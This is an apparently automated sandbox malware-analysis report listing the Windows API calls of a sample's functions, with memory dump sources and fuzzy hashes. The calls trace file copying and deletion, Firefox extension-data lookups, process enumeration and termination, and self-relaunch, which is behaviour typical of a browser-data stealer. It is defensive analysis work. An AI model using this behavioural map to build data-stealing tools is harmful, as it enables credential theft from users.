                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416903
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004169C6
                                            • ExitProcess.KERNEL32 ref: 004169F5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                            • String ID: <
                                            • API String ID: 1148417306-4251816714
                                            • Opcode ID: 80adf956ea99f7686bf73ed2305a0c7c355c3d8c509fc3f8e2274e2124ba97dc
                                            • Instruction ID: 69e214fcc2f82cbe4d830bf51364f862e1744f727ac50a07542482e63681b1c7
                                            • Opcode Fuzzy Hash: 80adf956ea99f7686bf73ed2305a0c7c355c3d8c509fc3f8e2274e2124ba97dc
                                            • Instruction Fuzzy Hash: 82313AB1902218ABDB14EB91DC92FDEB779AF08314F40418EF20566191DF787B88CF69
                                            Function 02466B37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 02466B6A
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 02466C2D
                                            • ExitProcess.KERNEL32 ref: 02466C5C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                            • String ID: <
                                            • API String ID: 1148417306-4251816714
                                            • Opcode ID: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
                                            • Instruction ID: c931928f9b0e23438b1da22ff0978418d97e979ab9806511af6b3cfa4c9bd67e
                                            • Opcode Fuzzy Hash: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
                                            • Instruction Fuzzy Hash: 05312CB1D01228ABDB14EB91DC98FEDB77AAF58300F40418EE20576190DF746B48CF66
                                            Function 00418EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                            • HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                            • wsprintfW.USER32 ref: 00418F08
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocProcesswsprintf
                                            • String ID: %hs
                                            • API String ID: 659108358-2783943728
                                            • Opcode ID: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                            • Instruction ID: abe7276d6e58fd7f286e9bcc6e4dd5022fdd169b0d4b331efbe0e5b16b2cc016
                                            • Opcode Fuzzy Hash: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                            • Instruction Fuzzy Hash: 47E08C70E49308BBDB00DB94ED0AF6D77B8EB44302F000196FD0987340EA719F008B96
                                            Function 0040A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,009CBD38,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040AA11
                                            • lstrlenA.KERNEL32(00000000,00000000), ref: 0040AB2F
                                            • lstrlenA.KERNEL32(00000000), ref: 0040ADEC
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040AE73
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                            • String ID:
                                            • API String ID: 257331557-0
                                            • Opcode ID: badd0b16bebf4880951e4b22bfce0ef8fa2e65dd17f4c9611185429b7f8720ee
                                            • Instruction ID: 5dfe8597df33c788f82f0551f3ba8d02d272d38f024b71a471f8e3c501a58f6f
                                            • Opcode Fuzzy Hash: badd0b16bebf4880951e4b22bfce0ef8fa2e65dd17f4c9611185429b7f8720ee
                                            • Instruction Fuzzy Hash: A9E134729111089BCB04FBA5DC66EEE7339AF14314F40855EF11672091EF387A9CCB6A
                                            Function 0245ABF7 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 02468F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,02451660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02468F7D
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0245AC78
                                            • lstrlen.KERNEL32(00000000,00000000), ref: 0245AD96
                                            • lstrlen.KERNEL32(00000000), ref: 0245B053
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 0245A7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 0245A7E4
                                            • DeleteFileA.KERNEL32(00000000), ref: 0245B0DA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                            • String ID:
                                            • API String ID: 257331557-0
                                            • Opcode ID: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
                                            • Instruction ID: 2dc21c2940fbeac004d8b1c82c565794786a00aa8f81279bfbfc13dfbe43ac72
                                            • Opcode Fuzzy Hash: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
                                            • Instruction Fuzzy Hash: 50E1CF72840528ABCB19FBA5DC98DFE733AAF14305F50855EE556720A0EF306A4CCF62
                                            Function 0040D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,009CBD38,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D581
                                            • lstrlenA.KERNEL32(00000000), ref: 0040D798
                                            • lstrlenA.KERNEL32(00000000), ref: 0040D7AC
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D82B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: 4c1525e857f093a45c2341733fa41754f3496238513f024d29210b144bef9689
                                            • Instruction ID: cd95120e3309aa2a4ee5e09d67847ecab6e8b781cb92854c7d2ac691bd2160a2
                                            • Opcode Fuzzy Hash: 4c1525e857f093a45c2341733fa41754f3496238513f024d29210b144bef9689
                                            • Instruction Fuzzy Hash: CF911672E111089BCB04FBA1EC66DEE7339AF14314F50456EF11672095EF387A98CB6A
                                            Function 0245D767 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 02468F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,02451660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02468F7D
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0245D7E8
                                            • lstrlen.KERNEL32(00000000), ref: 0245D9FF
                                            • lstrlen.KERNEL32(00000000), ref: 0245DA13
                                            • DeleteFileA.KERNEL32(00000000), ref: 0245DA92
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
                                            • Instruction ID: 5b9fbaf447f6c6454b04c42968de931d8e344e68411997e0ab687a48ec33bdc2
                                            • Opcode Fuzzy Hash: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
                                            • Instruction Fuzzy Hash: 6191E272D00628ABCB18FBA5DC58DFE733AAF14305F50456EE556B6090EF346A48CF62
                                            Function 0040D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,009CBD38,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D901
                                            • lstrlenA.KERNEL32(00000000), ref: 0040DA9F
                                            • lstrlenA.KERNEL32(00000000), ref: 0040DAB3
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040DB32
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: 1acd3d45d618d939c79b20cdc9903d53f52bed8242236e24ba2a76c9b265152c
                                            • Instruction ID: 660f6b77f2ff2b442eb80c9f7963c7c0f8ff679996332a2a68bd7dee448c32b7
                                            • Opcode Fuzzy Hash: 1acd3d45d618d939c79b20cdc9903d53f52bed8242236e24ba2a76c9b265152c
                                            • Instruction Fuzzy Hash: 28812572E111089BCB04FBA5EC66DEE7339AF14314F40455FF10662095EF387A98CB6A
                                            Function 0245DAE7 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 02468F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,02451660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02468F7D
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0245DB68
                                            • lstrlen.KERNEL32(00000000), ref: 0245DD06
                                            • lstrlen.KERNEL32(00000000), ref: 0245DD1A
                                            • DeleteFileA.KERNEL32(00000000), ref: 0245DD99
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
                                            • Instruction ID: 49ecb9f225b3a7b65b675a5002acaf391d7955ac2d40cd9d318af39f866de03b
                                            • Opcode Fuzzy Hash: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
                                            • Instruction Fuzzy Hash: 3C81E172D00628ABCB18FBA5DC58DFE773AAF14305F50456EE556B6090EF346A08CF62
                                            Function 024CF33E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                            • Instruction ID: e4d37494bc400c0a65f7a44fab40f83ed1ebccb5f6fd337b0f80e90bb9bb22cb
                                            • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                            • Instruction Fuzzy Hash: 6151F37A500602EFDB698F1DD840BAA73A7FF20305F36412FD84547AA0D739A889CB94
                                            Function 0040F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421678,00420D93), ref: 0040F64C
                                            • lstrlenA.KERNEL32(00000000), ref: 0040F66B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                            • String ID: ^userContextId=4294967295$moz-extension+++
                                            • API String ID: 998311485-3310892237
                                            • Opcode ID: 523766ba9e6db3e821a6d2c1536c81079b0302e78173aef5b8d6937599c7b161
                                            • Instruction ID: 3808d15f7e0f9f9184562117c9aa29465858450d569164ac2a98ea8b538c64df
                                            • Opcode Fuzzy Hash: 523766ba9e6db3e821a6d2c1536c81079b0302e78173aef5b8d6937599c7b161
                                            • Instruction Fuzzy Hash: 42517E72E011089BCB04FBA1ECA6DED7339AF54304F40852EF50667195EF386A5CCB6A
                                            Function 00419660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0041967B
                                              • Part of subcall function 00418EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                              • Part of subcall function 00418EE0: HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                              • Part of subcall function 00418EE0: wsprintfW.USER32 ref: 00418F08
                                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041973B
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419759
                                            • CloseHandle.KERNEL32(00000000), ref: 00419766
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                            • String ID:
                                            • API String ID: 396451647-0
                                            • Opcode ID: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
                                            • Instruction ID: 560ccd148ccd609fdd46163d5cc95655726043f4ba77f136f2594cdeec1b1660
                                            • Opcode Fuzzy Hash: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
                                            • Instruction Fuzzy Hash: C4315BB1E01208DBDB14DFE0DD49BEDB779BF44700F10445AF506AB284EB786A88CB56
                                            Function 024698C7 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 024698E2
                                              • Part of subcall function 02469147: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,02469915,00000000), ref: 02469152
                                              • Part of subcall function 02469147: RtlAllocateHeap.NTDLL(00000000), ref: 02469159
                                              • Part of subcall function 02469147: wsprintfW.USER32 ref: 0246916F
                                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 024699A2
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 024699C0
                                            • CloseHandle.KERNEL32(00000000), ref: 024699CD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                            • String ID:
                                            • API String ID: 3729781310-0
                                            • Opcode ID: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
                                            • Instruction ID: 7aa6c7d799509b460fae0320472e8cc9ec257fd2dfd2966a8c2c020cfb6cd781
                                            • Opcode Fuzzy Hash: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
                                            • Instruction Fuzzy Hash: 5D311AB1E01258EBDB14DFE0CD48BEDB779FB44700F50455AE506AA284EBB4AA48CF52
                                            Function 02468A77 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 02468AC1
                                            • Process32First.KERNEL32(?,00000128), ref: 02468AD5
                                            • Process32Next.KERNEL32(?,00000128), ref: 02468AEA
